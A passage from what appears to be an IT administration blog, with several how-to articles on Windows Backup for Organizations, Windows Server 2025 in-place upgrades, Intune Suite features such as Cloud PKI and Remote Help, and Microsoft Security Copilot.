- If Autopilot is used, it needs to use user-driven mode
- Microsoft Entra joined

IMPORTANT

If device needs to be updated to a build older than July 2025.

🔧 Configuration

Restore Configuration

Now, a side panel opens on the right. Select On under Show restore page and then select Save.

Backup Configuration

Sign in to the Intune admin center -> Devices -> Configuration and select + Create -> + New Policy.
Now select Windows 10 and later as platform and Settings catalog as profile type and click Create.
Next you enter your Name and Description for the profile and click Next.
Now you click on Add settings, select Administrative Templates\Windows Components\Sync your settings\Enable Windows Backup and set it to Enabled.

On the next page, add scope tags if needed. On the page after that, assign the profile to your desired groups. Lastly go tho the Review + create page and click Create.

Reporting

To view reporting on device restores, sign in to the Intune admin center, navigate to Devices, select the device that used the restore option during OOBE and you will be able to see the restore status in the Enrollment section.

👤 User Experience

Backup Process

After an administrator configures the backup policy, Windows automatically backs up user settings, preferences, and installed Microsoft Store apps every eight days through a scheduled task. The user does not need to do anything and will not take notice of the backup happening.

You can see the backup status in the Windows Settings app under Accounts -> Windows backup.

Users can also initiate a manual backup by opening the Windows Backup app and following the prompts.

Restore process

During OOBE, the restore process follows these steps:

Sign in with your Microsoft Entra ID account (the same work or school account used during backup).
The restore page appears after sign-in.

Select a device to restore settings from (you will see a screenshot of the backed up desktop) or choose to configure the device as new (To configure as new, you need to select More options first.).

Select Continue to restore backed-up user settings and Microsoft Store apps.
Complete the remaining OOBE process as normal.
Once you reach the desktop, your previously backed-up settings and apps are automatically restored.

INFO

If you find your Conditional Access policies interfiering somehow in the process, you can find more information about that here.

💡 Conclusion

Windows Backup for Organizations lets you keep user settings and store apps backed up in the cloud, which makes it easier to refresh and restore devices. It is the perfect companion to OneDrive, with the first one holding settings and the second one the data. With this combination you can offer a painless cloud-first device replacement experience. With this, you could even argue that resetting a device remotely is so painless, that it's much quicker and easier than any troubleshooting IT can do, especially for remote users.

Try it out with a few people, tell end users about the new backup screen and then roll it out bit by bit. It's basically risk-free and the only thing that changes for the user is that they get their settings back when they get a new PC.

Windows Server in-place Upgrade to 2025 | Windows Server | Windows

Wed, 10 Dec 2025 22:55:22 GMT

Windows Server in-place Upgrade from 2012 R2 to 2025

👋 Introduction

Windows Server in-place Upgrade is a process designed to help you upgrade your existing Windows Server 2012 R2, 2016, 2019 or 2022 to Windows Server 2025 without the need for a complete reinstallation. This guide provides step-by-step instructions to ensure a smooth and successful upgrade, minimizing downtime and preserving your server settings and data.

Current service end Windows Server:

Windows Server Version	Mainstream Support end	Extended Support end
Windows Server 2012 R2	End of servicing	End of servicing
Windows Server 2016	End of servicing	January 12, 2027
Windows Server 2019	End of servicing	January 9, 2029
Windows Server 2022	October 13, 2026	October 14, 2031

⬆️ Upgrade

Example: Windows Server 2012 R2 -> Windows Server 2025

TIP

Do not make an in-place upgrade of a Domain Controller. Set up a new server and promote it to DC instead. Learn more here.

Start the setup from a DVD or mounted ISO file.
If you select Change how Setup downloads updates, you can select to not download and install updates during the upgrade process in the next window.

WARNING

It is recommended to have a fully updated system before starting the upgrade process.

Now you can select the edition you want to upgrade to.

IMPORTANT

If you select a different edition than the one currently installed, you will not be able to keep your apps and settings.

Now the system checks if the upgrade can be performed and then you also need to accept the license terms.

After that you can choose to keep files, settings and apps or not. Next the system will check for updates if selected at the start.

Finally, after when the setup checked everything, you can start the upgrade process by clicking on Install.

Then the installation process runs and the server will restart a few times.

If you didn`t keep your settings, you select your languages again and set a password.

Then you are ready to log in again. After the login you need to select the diagnostics settings and all is set.

💡 Conclusion

In-place upgrades are a great way to upgrade non-critical servers where a rollback is not that difficult and you can save a lot of time. For critical servers like Domain Controllers or database servers, a clean installation is nearly always the better option.

In-place Pro's

Server continuity: The upgrade maintains your server's settings, identity, IP address, hostname and domain membership.
Automatic migration: Applications and configurations migrate automatically, reducing manual efforts.

In-place Con's

Baggage: The upgrade retains old registry entries, clutter, drivers and more from the previous OS which all can impact the system later down the line.
No replacement: No automatic process will replace your do dilligence in testing the server, the applications and checking functionality.

References

Additional capabilities | Intune Suite | Intune

Sun, 07 Dec 2025 11:49:50 GMT

Additional capabilities of the Intune Suite

The Intune Suite offers several advanced capabilities beyond its core functionality, which I will give an overview of in the following article. These include support for specialty devices, firmware over-the-air updates, and Microsoft Tunnel for Mobile Application Management (MAM). Together, these features help organizations manage a wider range of devices, ensure up-to-date firmware, and provide secure access for mobile apps without requiring full device enrollment.

🚇 Microsoft Tunnel for Mobile Application Management

Introduction

Microsoft Tunnel for MAM lets users securely access company data on their personal devices, no device enrollment required. With support for modern authentication, single sign-on, and Conditional Access, it keeps work secure without giving IT access to the whole device. It’s a smart way for companies to boost security while still respecting user privacy and keeping things simple.

Architecture

Microsoft Tunnel is a VPN gateway for Intune that runs on a Linux container and lets you securely access on-prem resources using modern authentication and Conditional Access.

TIP

You can find a more in depth overview of the Archtiecture on Microsoft Learn.

Configuration

Tunnel for MAM uses the Microsoft Tunnel Gateway and has therefore the same requirements you can find here.
Once Microsoft Tunnel is up and running, you’ll just need to add two app configuration policies and an app protection policy to get Tunnel for MAM working.

Microsoft Tunnel configuration

INFO

This will only be a brief overview of the Microsoft Tunnel configuration, as it is a prerequisite for Tunnel for MAM, but is a separate feature.

To start the Configuration you need to open the Intune admin center → Tenant administration → Microsoft Tunnel Gateway
Here you can create the nessecary settings for Server configurations, Sites and Servers.

The following steps are required to create a Microsoft Tunnel:

WARNING

In order to use the Microsoft tunnel on your Android or iOS/iPadOS device, you will need the Defender for Endpoint app, as this acts as the tunnel client. For Tunnel for MAM the Defender App is only needed on Android devices. iOS uses a SDK integration for that and does not need the App (Learn more here). In addition, you will need to create a VPN profile in your device settings and custom app settings for the Defender for Endpoint app to direct it to use the tunnel. You can find more information on how to do this here:

App configuration and protection policies

The next step is to create the App configuration and protection policies so that we can extend the Microsoft Tunnel Gateway to MAM Apps (not enrolled devices).

Open the Intune admin center → Apps
Here you find the Configuration and Protection blades where you can create the coresponding policies.

You can find a Step-by-Step Guide to create the Android policies and iOS policies on the Microsoft Learn Page.

TIP

You can also find an interactive Demo on the Learn page, that not only shows you how to create the settings, but also how it looks on the mobile OS.

References

☁️ Firmware over-the-air update

Introduction

INFO

Firmware over-the-air update supports currently only Zebra LifeGuard for Android.

Zebra LifeGuard Over-the-Air (LG OTA) Integration with Microsoft Intune is a feature that allows organizations to manage firmware updates for Zebra Android devices directly through the Intune. This integration helps with single pane of glass management and simplifies hands-free, automated deployment of updates.

How to set it up?

Step 1: Set up Zebra Connector
Step 2: Enroll Devices with Zebra LG OTA Service
Step 3: Create and Assign Deployments
Step 4: View and Manage Deployments

References

📺 Support for specialty devices

Introduction

Intune Suite’s Support for Specialty Devices makes it easier to manage and secure things like AR/VR headsets, large smart screens, and certain meeting room devices.

IT administrators can use this support to ensure that these devices are secure and compliant with organisational policies. Features include device provisioning, certificate and Wi-Fi management, Conditional Access, device compliance, app lifecycle management and remote actions.

How does it work?

You can enrol the following devices using the Company Portal App or via web enrolment:

AR / VR headsets
large smart-screen devices
select conference room meeting devices (additional teams room pro licences are required usually)

References

Enterprise Application Management | Intune Suite | Intune

Sun, 07 Dec 2025 11:49:50 GMT

Enterprise Application Management

👋 Introduction

Enterprise Application Management (EAM) makes it super simple to deploy and keep your Win32 apps up to date using the Enterprise App Catalog. Instead of manually packaging and updating apps yourself, you get access to a catalog of popular Microsoft and third-party apps that are already prepped and maintained by Microsoft. No more worrying about packaging, testing, or chasing updates.

Everything is managed right from Intune, so you can deploy and update apps from one place. It saves your IT team a ton of time and helps to keep your apps on the latest versions. Plus, Microsoft keeps adding new features and more apps to make things even easier.

Features:

App management: Quickly find and add apps from the Intune Portal without manual packaging needed.
Latest apps: New app versions are added automatically, and you can track updates in the catalog report.

When you add an app from the Enterprise App Catalog, Intune prefills the the follwing installation details for you:

install/uninstall commands
install time and restart behavior
uninstall and error behavior
detection rules and requirements

INFO

Prepopulated fields can be modified if needed.

✅ Prerequisites

64-bit versions of Windows
Endpoints need to reach *.manage.microsoft.com
Intune suite license, Enterprise Application Management standalone license or Microsoft 365 E5 license

📱 Adding an app with EAM

Open the Intune admin center → Apps → Windows and then click Create.
Select the 'App type' Enterprise App Catalog app and click Select.

In the 'App information' select Search the Enterprise App Catalog and then search for your app and click Next.

In the Configuration tap you will now get a list of the available Versions. Select the one you want and click Select.

Now you will get back to the Intune App Configuration screen you know, but with all details prepopulated for the app you selected.

You just need to add the assignment and you are done.

TIP

You can recognize apps deployed through EAM by their app type Windows catalog app (Win32).
You can find a complete list of available Apps in the Enterprise App Catalog here.
Microsoft adds constantly more Apps and has the Goal to get to several thousand apps.

📲 Updating an app with EAM

When you open an app created with EAM, you can update it directly using the Update button. If the app is already on the latest version, an info banner will notify you.

Clicking the Update button starts a new app creation process, automatically populating the details for the newer version, just like when you first created the app. Only this time the 'Supersedence' section is filled in as well, with information about the older version of the app.

WARNING

If you intentionally install an older version of an app, EAM will display a banner indicating it is the latest version, since you specifically chose that version. To update to a newer version later, you will need to create a new app manually.

If you select the Enterprise App Catalog with updates button on the Overview page, you will find a report with all the EAM apps that can be updated. You can initiate the update process directly through the report, via the ... on the right side.

💡 Conclusion

Enterprise Application Management takes the hassle out of app deployment and updates, letting you focus on what matters most. With the Enterprise App Catalog, you get a growing list of ready-to-go apps, all managed right from Intune. As Microsoft keeps adding new features and apps, managing software across your organization just keeps getting easier. It’s a real time-saver for IT teams and helps keep everyone up to date—no more chasing down the latest versions!

TIP

Microsoft is activly working on a ton of new features for EAM and gets better all the time. You can find the currently publicly known developments in the official Microsoft Blog here.

Example:
The Add Enterprise App Catalog apps to ESP blocking apps list feature, will help IT admins to manage apps in both the old and new Autopilot profiles. This update simplifies app updates without needing to modify profiles for new versions.

What is the Intune Suite? | Intune

Sun, 07 Dec 2025 11:49:50 GMT

👋 Introduction

The Microsoft Intune Suite is a set off 8 add-on capabilities that build on top of the current Intune ecosystem to enhance and complete the already vast feature set. You can purchase the Intune Suite as a bundle license on top of Intune itself or as separate licenses for each capability. In addition, some Microsoft 365 plans also include Intune Suite features.

Capability	Standalone add-on	Intune Plan 2	Intune Suite	M365 E3	M365 E5
Endpoint Privilege Management	✅	❌	✅	❌	✅
Enterprise App Management	✅	❌	✅	❌	✅
Advanced Analytics	✅	❌	✅	✅	✅
Remote Help	✅	❌	✅	✅	✅
Microsoft Tunnel for Mobile Application Management	❌	✅	✅	✅	✅
Microsoft Cloud PKI	✅	❌	✅	❌	✅
Firmware-over-the-air update	❌	✅	✅	✅	✅
Specialized devices management	❌	✅	✅	✅	✅

📜 Features

Name	Description
Endpoint Privilege Management	Enables users to run with least privilege while allowing approved tasks to elevate.
Enterprise App Management	Provides a catalog of Win32 apps in Intune with default install, requirements, and detection settings prefilled.
Advanced Analytics	Analytics-driven tools to help IT admins monitor and improve end-user experience.
Remote Help	Secure, cloud-based help desk tool with role-based access for remote support.
Microsoft Tunnel for Mobile Application Management	Extends Microsoft Tunnel VPN to support unenrolled Android and iOS devices for secure app access.
Cloud PKI	Delivers a managed cloud-based PKI for automated certificate issuance, renewal, and revocation across all Intune-supported platforms.
Firmware-over-the-air updates	Zebra LifeGuard Over-the-Air Integration with Microsoft Intune
Specialized devices management	Manage and secure purpose-built devices like AR/VR headsets, smart screens, and meeting room devices.

💸 Is it worth it?

Whether the Intune Suite is worth the investment depends on your organization's needs. If you require advanced device management, streamlined app deployment, enhanced security, and remote support capabilities, the suite offers significant value by consolidating these features into a single platform. For organizations already using Microsoft 365 and got the licenses, the suite is a no brainer since it is now included in the main M365 plans (E3 and E5).

However, if you don't need these features, or if you already have alternative solutions in place and you do not use M365 Enterprise licenses, the additional cost in licenses may not be justified, but it could be well worth checking out and comparing costs with your current solution.

Cloud PKI | Intune Suite | Intune

Sun, 07 Dec 2025 11:49:50 GMT

Microsoft Cloud PKI

👋 Introduction

Public Key Infrastructure (PKI) is a framework that uses digital certificates to authenticate identities and secure communications between devices and services. PKI can be used for protecting access for example to VPN, Wi-Fi, email, web access or devices, but a traditional PKI can be complex and resource-intensive, often requiringing a whole on-premise environment.

Microsoft Cloud PKI, part of the Intune Suite, delivers a fully cloud-based solution that automates certificate issuance, renewal, and revocation. By eliminating the need for on-premises infrastructure, Cloud PKI simplifies certificate lifecycle management across all supported platforms, making it easier for organizations to secure their environments at scale. This article provides an overview of Microsoft Cloud PKI, its core functionality, and its architecture.

Cloud PKI Features

Feature	Overview
Multiple CAs per tenant	Create a two-tier PKI hierarchy (root and issuing CA) fully in the cloud.
Bring Your Own CA (BYOCA)	Chain an Intune Issuing CA to your existing private CA (Microsoft or non-Microsoft), supporting external multi-tier hierarchies.
Signing & encryption algorithms	Supports RSA (2048, 3072, 4096-bit keys).
Hash algorithms	Supports SHA-256, SHA-384, SHA-512.
HSM-backed keys	CAs use Azure Managed HSM for key protection (no Azure subscription needed with Intune Suite/Cloud PKI license).
Certificate registration authority	Built-in SCEP registration authority for each Cloud PKI Issuing CA.
CRL distribution	Intune hosts CRL endpoints - CRLs valid for 7 days, refreshed every 3.5 days, updated on revocation.
AIA endpoints	Intune hosts AIA endpoints for parent certificate retrieval.
End-entity certificate issuance	Issues SCEP (PKCS#7) certificates to Intune-enrolled devices.
Certificate lifecycle management	Issue, renew, and revoke certificates.
Reporting dashboard	Monitor certificate status and revoke certificates in the Intune admin center (updated daily).
Auditing	Track admin actions (create, revoke, search) in Intune.
RBAC permissions	Custom roles for Cloud PKI management (read, create, revoke, disable/enable CAs).
Scope tags	Assign, edit, or remove scope tags for CAs.

WARNING

Be aware the trial CAs use software-based RSA keys and you can not change that even after purchasing a license. You need to create a new CA after that.

✅ Prerequisites

Supported platforms: Android, iOS/iPadOS, macOS, Windows (devices must be Intune-enrolled and support SCEP certificate profiles)
Licensing: Microsoft Intune Suite license, Microsoft Cloud PKI standalone add-on license or Microsoft 365 E5 license
Permissions: Assigned Intune role permissions
- Read certificate authorities (CAs)
- Create root or issuing CAs
- Revoke issued leaf certificates (requires read CA permission)

INFO

For more information about configuring custom roles and scope tags in Intune, refer to Role-based access control with Microsoft Intune.

🌊 Architecture & Flow

Microsoft Cloud PKI issues certificates using SCEP with it's cloud-based CA and registration authority.

INFO

The certificate registration authority consists of B2 and B3 in the architecture.

Preperations in Intune (B1, B2 & B3):

Create Cloud PKI root and issuing CAs.
Assign trusted certificate profiles for both CAs.
Assign platform-specific SCEP certificate profiles.

Arcitecture flow:

A1. Device checks in and receives certificate/SCEP profiles.
A2. Device generates a private key and CSR, sends to SCEP service.
A3. SCEP service validates the request.
A4. Registration authority requests issuing CA to sign the CSR.
A5. Device receives the signed certificate.

NOTE

The SCEP challenge is encrypted and signed by Intune to ensure secure certificate requests.

📃 Certificate fundamentals

Certification authority types

A certification authority (CA) performs the following tasks:

Verifies the identity of a certificate requestor
Issues certificates to requestors
Manages certificate revocation

Microsoft Cloud PKI supports these types of certificate authorities:

Root CA
Issuing CA

Root certification authority

A root certification authority (CA) sits at the very top of your PKI setup, think of it as the main source of trust for everything below it. Its certificate is self-signed, meaning it basically vouches for itself (the issuer and subject are the same). You trust a root CA by adding its certificate to your trusted root store. From there, the root CA can hand out certificates to other CAs or even directly to users, devices, or services, signing each one with its private key to prove they're legit.

IMPORTANT

Microsoft Cloud PKI issues certificates exclusively to devices that are enrolled through mobile device management (MDM).

Issuing certification authority

NOTE

The terms intermediate, issuing, and subordinate all refer to the same CA role. Microsoft Cloud PKI uses "issuing CA" for this type.

An issuing CA is a subordinate certification authority that operates below a root CA in the hierarchy. It can:

Issue certificates to other subordinate CAs within the hierarchy.
Issue end-entity (leaf) certificates to servers, services, clients, or devices.

Issuing CAs can be positioned at any tier in the CA hierarchy except the root level.

Chaining

Chaining determines the optimal trust path for verifying a certificate. Each OS or service uses a certificate chain engine to compute and validate this path.

The chain building process involves:

Certificate discovery: The process of finding and retrieving the issuing CA certificate for a leaf certificate, ensuring the chain leads up to a trusted root CA.
Certificate validation: Building possible chains and checking each certificate for validity (name, time, signature, revocation, and other constraints).
Selecting the best chain: Returning the highest quality trust path.

When verifying a certificate, the chain engine searches the certificate store for intermediate and root candidates. Multiple intermediates may be needed to complete the chain. The engine matches certificates using the subject key identifier (SKI) and authority key identifier (AKI), repeating the process until it finds a self-signed root certificate.

Chain validation process

NOTE

Certificate chain validation methods differ by OS. This section covers Windows 10/11.

Windows validates certificate chains using three methods:

Exact match: Uses issuer’s subject, serial number, and KeyID from the AKI extension.
Key match: Uses only the KeyID from AKI to find a parent with a matching SKI.
Name match: If AKI is missing, matches the issuer’s subject name to the parent’s subject.

If SKI and AKI are missing, Windows uses name matching and if duplicates exist, selects the newest certificate. If the parent certificate isn't found locally, Windows tries to retrieve it using URLs from the authority information access field.

Each certificate in the chain is checked for formatting, validity, revocation and that the chain ends in a trusted root.
The chain is valid only if all checks pass.

Name matching chain validation example:

Chain of trust

For certificate-based authentication to work, both your devices and services (like Wi-Fi, VPN, or web apps) need to trust the full CA chain. Just make sure the root CA certificate is installed everywhere. If a device is missing the issuing CA cert, it can usually grab it automatically using the AIA (Authority Information Access) info in the certificate.

Certificate-based authentication

The certificate-based authentication process and handshake work as follows:

Your device starts talking to the service it wants to connect to.
The service replies that it wants to establish a secure connection using TLS/SSL and the SSL handshake begins.
The service asks your device to show a client authentication certificate.
Your device hands over its certificate so it can prove who it is.

🧑‍🔧 Configurating Cloud PKI

Microsoft Cloud PKI supports two deployment options:

Cloud root CA: Set up a private, cloud-based two-tier PKI in your Intune tenant, with a root CA and one or more issuing CAs that deliver certificates to managed devices via SCEP. All CAs remain tenant-private.
Bring your own CA (BYOCA): Use your existing private CA (e.g., ADCS) as the trust anchor by creating a cloud-based issuing CA in Intune. Intune sends a CSR (Certificate Signing Request) for your private CA to sign, establishing the trust chain.

Microsoft Cloud PKI objects are created and managed in the Microsoft Intune admin center. From there, you can:

Set up and manage Cloud PKI
Create and assign certificate profiles to devices
Monitor issued certificates

Trust Anchor Location and Chain of Trust

In order to use certificate-based authentication, you must first decide where to store the trust anchor (usually the root CA). This anchor enables devices and services to verify certificates. Ensure that all systems have the complete certificate chain, from the root to the issuing CA. If an intermediate certificate is missing, it can often be retrieved automatically via the AIA link in the certificate.

Configure Cloud CA

Sign in to the Microsoft Intune admin center and navigate to Tenant administration → Cloud PKI and select Create.

On the first page provide a Name and a Description.
On the Configuration settings page you configure the CA settings.

CA type: Root CA	CA type: Issuing CA
Validity period: 5, 10, 15, 20 or 25 years	Root CA source: Intune or BYOCA Validity period: 2, 4, 6, 8 or 10 years (The validity must not exceed the root CA's)

Extended Key Usages purposes: Sever auth Client auth Code signing Email protection IPSEC end system IPSEC tunnel IPSEC user Time stamping OCSP signing Smartcard logon MAC adress Custom Type Name Object Identifier	Extended Key Usages purposes: Select the intended purpose of the CA from those selected in the Root CA settings.
Subject attributes: Common name (CN) Optional: Organization (O) Country (C) (must be a two-character code) State/province (ST) Locality (L)	Subject attributes: Common name (CN) Optional: Organization (O) Country (C) (must be a two-character code) State/province (ST) Locality (L)
Encryption, select the key size and algorithm: RSA-2048 and SHA-256 RSA-3072 and SHA-384 RSA-4096 and SHA-512	The Encryption is set by the root CA.

INFO

You can use custom validity periods with the Microsoft Graph API.

Select Next and on the next to pages you can add Scope tags and create the CA.

WARNING

Setting cannot be changed after creation.

Configure Bring your own Root CA (BYOCA)

Remote Help | Intune Suite | Intune

Sun, 07 Dec 2025 11:49:50 GMT

Remote Help

👋 Introduction

Remote Help is a Microsoft cloud-based remote support tool designed for IT teams. It enables support staff (helpers) to securely connect to users’ devices (sharers) using organizational accounts via Microsoft Entra ID, ensuring secure and authenticated sessions.

With Remote Help, you can leverage Intune’s role-based access control (RBAC) to define exactly who can provide support and what level of access they have. This gives organizations granular control over remote assistance, helping maintain security and compliance throughout the support process.

Features

Support for unenrolled devices: You can enable assistance for users on devices not enrolled in Intune.
Organization sign-in: To prevent impersonations, both the helper and the person receiving support use Microsoft Entra accounts to verify their identity.
Compliance warnings: If a device doesn’t meet your organization’s compliance policies, helpers will see a warning before connecting.
Role-based access control (RBAC): Admins can fine-tune who can provide assistance, the permissions they have on the remote device, and whether users can simply view or take full control.
Monitor sessions: View real-time and historical reports in the Intune admin center, including who helped whom, which device was involved, session duration, and audit logs.

Limitations

If you’re helping users on unenrolled devices, the auditing and reporting features are more limited.
You cannot establish a Remote Help session from one tenant to a user in a different tenant.

✅ Prerequisites

General prerequisites

License

Remote Help add on license, Intune Suite license or M365 E3 / E5 license for all helpers and sharers

Supported platforms

Windows 10/11
Windows 10/11 on ARM64 devices
Windows 365
Android
Android Enterprise dedicated devices (Samsung and Zebra devices)
macOS
iOS/iPadOS (works with supported browsers)
Azure Virtual Desktop
Linux (not officially supported but works with supported browsers)
Browser
- Safari
- Chrome
- Edge
- Firefox

Platform prerequisites

Remote Help on Windows

Supports enrolled and unenrolled devices.
Sharer's device must be Intune-enrolled (to remotely start a session).
Remote Help uses port 443 (HTTPS) to connect to https://remotehelp.microsoft.com via RDP, secured with TLS 1.2.
(See Microsoft docs for the full list of required network endpoints.)

Remote Help on macOS

No special prerequisites are required.

Remote Help Web App

Single-Sign-On

Remote Help on Android

Samsung devices (Android Enterprise Dedicated)
Zebra devices (Android Enterprise Dedicated)

📊 Data and 🔒 privacy

Microsoft logs minimal session data to monitor Remote Help health, this includes:

Session times: When a session starts and ends (retained for 30 days).
Session details: Includes the identities of the helper and sharer, and the device involved (retained for 30 days).
Errors: Issues like disconnections are logged on the sharer's device in Event Viewer.
Features used: Actions performed during the session, such as view-only mode or elevation requests (retained for 30 days).

Remote Help logs session details locally in Windows Event Logs for both helper and sharer.
Microsoft cannot access session content or see actions or keystrokes.

Both the helper and sharer see these details from each other's organizational profiles:

Profile picture (if you have one)
Company name
Verified domain
First and last name
Job title

INFO

Microsoft stores nothing longer then 30 days.

🧑‍🔧 Configuration

Tenant Config

To configure Remote Help in your tenant (for any supported platform), follow these steps:

Turn on Remote Help

Sign in to the Microsoft Intune admin center and head to Tenant administration → Remote Help.
Select the Settings tab.
1. Enable Remote Help
2. Choose whether to allow users to receive help on unenrolled devices, then set this option to Allowed if desired.
3. Choose whether to allow helpers and sharers to chat with each other during a session, then set this option to No if desired.

Set up permissions for Remote Help

Remote Help uses Intune’s role-based access controls (RBAC) to decide who can help and what they’re allowed to do.

The Help Desk Operator Role gives you all permissions for a remote help session.

Here are the main permissions you can configure for Remote Help sessions:

	Category: Remote Help app Elevation View screen Unattended control Take full control
	Category: Remote tasks Offer remote assistance

NOTE

Some permissions are dependent on others. When you enable a setting, related permissions are automatically granted:

Enabling Take full control also enables View screen.
Enabling Elevation also enables both Take full control and View screen.
Enabling Unattended control automatically grants all other permissions.

The default Help Desk Operator role comes pre-configured with all necessary Remote Help permissions enabled. You can assign this role as-is, or create custom roles to tailor permissions for different support scenarios. For more details on configuring RBAC, see Role-based access control.

Assign users to roles

To grant helpers the necessary permissions, assign them to the appropriate role:

Sign in to the Microsoft Intune admin center and navigate to Tenant administration → Roles and select a role.
Now open Assignments, then click Assign to create a new role assignment.
On the Basics page, enter a name and description and click Next.
On the Admin Groups page, select your helper group and click Next.
Now enter a Scope tag if you want and then create the Assignment.

App deployment

You can either deploy the App through Intune or install it directly on the target machines.

To install it manuall you can download the latest version of Remote Help directly from Microsoft or your can install it with Winget.

powershell

Winget install Microsoft.RemoteHelp

To deploy the app through Intune, you have two main options:

Download and package: Download the installer, package it as an INTUNEWIN file, and deploy it as a Win32 app via Intune.
Universal App deployment (no packaging): Use my Universal App deployment method to install the app directly with Winget, without the need for packaging.

If you choose the INTUNEWIN method, use the following information for deployment:

powershell

# Install command
remotehelpinstaller.exe /quiet acceptTerms=1 enableAutoUpdates=1

powershell

# Uninstall command
remotehelpinstaller.exe /uninstall /quiet acceptTerms=1

detection Rule

For Rule type, select File
For Path, specify C:\Program Files\Remote Help
For File or folder, specify RemoteHelp.exe
For Detection method, select String (version)
For Operator, select Greater than or equal to
For Value, enter the Remote Help version to deploy (e.g., 10.0.22467.1000).
Leave Associated with a 32-bit app on 64-bit clients set to No

WebApp

Sharer: https://aka.ms/rh	Remote Helper: https://aka.ms/rhh

Macos

If you have a MacOS Client you can download the latest version of Remote Help directly from Microsoft.

iOS

To use Remote Help on iOS, install the Intune App or access the Web App using a supported browser.

Android

To use Remote Help on Android Enterprise devices, install the Intune App or access the Web App using a supported browser.

Additionally, ensure that screen capture is allowed in your Android device policies.

For Zebra devices: Configure Zebra OEMConfig as described in the Microsoft documentation.

Conditional Access

To control Remote Help with conditional access you need to create a Service Principal using the Remote Assistance Service AppId.

powershell

New-MgServicePrincipal -AppId "1dee7b72-b80d-4e56-933d-8b6b04f9a3e2"

⌨️ Usage

To start a remote session you can either start the app yourself and exchange a security code with the enduser or you can start a session directly trough Intune. Then the security code is already taken care of by Intune.

If you want to start a remote session right from Intune, just open the Intune Admin portal, head to Devices, pick the device you want to help, and hit New remote assistance session.

A flyout will appear, and a notification is sent to the end user. When the user clicks the toast notification, Remote Help launches automatically and waits for you to initiate the session, no code exchange required. If the end user has already started Remote Help, the flyout updates to show a green checkmark next to Launch Remote Help. You can then proceed directly to step 4.

To start a remote session without Intune, use the following instructions.

The user first need to sign in to the Remote Help Client or has SSO active.

Next the helper clicks the Get security code button and then has 10 Minutes time to give this code to a sharer (Enuser that needs help).
The sharer takes the security code from the helper and puts it into the appropriate box in the Remote Help Client.

Helper view	Sharer view

Now the sharer sees a waiting screen while the Helper is choosing if he wants to Take full control or View screen.

Security Check

Before the helper can take control or view the screen, both parties will see each other's organizational details (name, company, domain, etc.) to confirm identities and prevent impersonation. This step ensures that only authorized helpers from your organization can provide assistance.

Helper view	Sharer view

Once the helper has selected their desired action, the sharer receives a pop-up window displaying the helper’s account details and the requested action (view screen or take control). The sharer can then choose to allow or decline the connection.

Information

If you do not have the required RBAC permissions in Intune to act as a helper, a notification window will appear informing you that you lack the necessary permissions to provide remote assistance.

The sharer now just sees a simple bar at the top where he can stop the session with X or start a Chat 💬.

The helper has a view tools in his bar to direct the session.
- Request Control
- Admin Session 🖥️
- Laser pointer 📍
- On-Screen Pen 🖊️
- Fullscreen 🪟
- Chat 💬
- Restart machine ↩️ (only in admin mode)
- Task manager 📟 (only in admin mode)
- Leave

If the helper requests control, the sharer gets the request in his Remote Help bar, where he can Allow or Deny.

If you need to start an elevated window during a Remote Help session, the UAC prompt will appear on the secure desktop by default. This means your session view will go black and display a ⏸️ symbol, as you cannot see the secure desktop until an Admin Session is enabled.

Helper view	Sharer view

If the helper to enter credentials or have access to the UAC prompt, you can activate an Admin Session.

Once the Admin Session is enabled, if a UAC prompt appears, the helper will be able to view and interact with the elevated windows directly.

Helper view	Sharer view

IMPORTANT

While the Admin Session is enabled you will see a warning message reminding you of closing all elevated windows before leaving the session.

If the session is closed by the sharer while an admin session is still active, the user will be signed out immediately. This ensures that all elevated windows are closed, protecting admin credentials.

When the session gets ended by either side, all parties will see a coresponding message.

Helper view	Sharer view

🔍 Monitoring

You can keep an eye on how Remote Help is being used right from the Intune admin center.

Sign in to the Microsoft Intune admin center and go to Tenant admin → Remote Help.
On the Monitor tab, you’ll see active sessions and some history about past sessions.

On the Remote Help sessions tab, you’ll find details about past sessions.

Information

For Android Enterprise Dedicated devices, you’ll see “--” for Recipient ID and Recipient name since these devices don’t have user affinity.
Reporting is more limited for unenrolled devices.

💡 Conclusion

Remote Help makes it easy for IT teams to support users securely and efficiently, right from Microsoft Intune. 🚀 With Entra ID sign-in, RBAC, and session auditing, you can be confident that support sessions stay safe and compliant. Whether you’re helping users on Windows, Mac, Android or even unenrolled devices, Remote Help has you covered. 💻 📱

🔧 ✅ Microsoft continues to improve Remote Help, so you’ll see even more capabilities over time. Recent updates have included support for additional platforms, enhanced security features, and improved integration with Intune and Microsoft Entra ID. Stay tuned for new features such as expanded unattended access, deeper reporting, and broader device compatibility as Microsoft responds to customer feedback and evolving IT needs.

If your organisation uses Microsoft tools, Remote Help could be a practical choice for modern endpoint support. 🤝 It's still not quite on par with other remote control solutions, but it makes great strides and its integration into the Microsoft environment gives it a huge advantage.

Microsoft Security Copilot | Security

Sat, 06 Dec 2025 19:10:13 GMT

Microsoft Security Copilot

👋 Introduction

Security Copilot is a smart AI assistant for your IT team. It stands out as the only tool that combines an AI built specifically for security with Microsoft’s powerful tech. This unique mix allows it to spot hidden threats faster using massive amounts of data and tells you how to fix them. It connects seamlessly with the other M365 tools, like:

Microsoft Defender XDR
Microsoft Sentinel
Microsoft Intune
Microsoft Entra
Microsoft Purview
Microsoft Defender for Cloud
External Attack Surface Management
Azure security tools (eg. Azure Firewall)

Security Copilot supports Microsoft-built agents, partner agents and custom agents that you can create yourself.

👷‍♂️ What can the Security Copilot do?

Firstly, Security Copilot provides a large number of agents that offer specific assistance with particular tasks in Entra, Intune, Defender, Purview and Sentinel. These range from analysing conditional access policies to triaging incidents. Secondly, it enables you to query your security data using natural language, write KQL queries and more. And thirdly, you can integrate third-party plugins to extend the available data even further.

Possible use cases:

Investigation and response: Summarize alerts and get guided steps to resolve issues
KQL queries: Writes advanced hunting or device query scripts for you
Security posture: Helps assess and improve your security posture
Policy management: Reviews and suggests improvements to security policies
Endpoint privelege management: Helps you understand if files that get requested for elevation are malicious or not
Reports: Produces targeted reports with risks and recommended actions.

🤖 What are Agents?

To the point, an AI agent is a specialized algorithm built on top of an LLM (Large Language Model) that can perform a specific task autonomously or with a trigger. Usually agents are capable of using the environment around them as context to make decisions and take actions. Security Agents in particular do the excact same, just specialized on security tasks.

🫴 What are assistants?

An AI assistant is basically the same as an agent, with the one difference, that it requires human approval before taking any actions.

